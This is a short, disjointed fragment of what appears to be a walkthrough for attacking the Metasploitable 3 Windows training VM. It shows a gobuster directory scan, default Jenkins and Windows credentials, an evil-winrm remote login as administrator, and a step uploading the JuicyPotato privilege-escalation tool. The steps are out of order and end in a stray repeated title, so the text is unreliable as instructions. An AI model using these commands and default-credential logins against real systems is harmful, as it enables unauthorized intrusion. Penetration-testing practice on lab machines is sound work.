Metasploitable - 3 Windows Walkthrough
gobuster dir -u http://192.168.56.102 -w /usr/share/wordlists/dirb/common.txt Look for /jenkins or /phpmyadmin . Metasploitable 3 often has Jenkins running on port 80 via a virtual directory. If you find Jenkins, navigate there. The credentials in Metasploitable 3 default to admin / admin (or no password).
Upload JuicyPotato.exe via Evil-WinRM:
# Install evil-winrm gem install evil-winrm evil-winrm -i 192.168.56.102 -u administrator -p vagrant metasploitable 3 windows walkthrough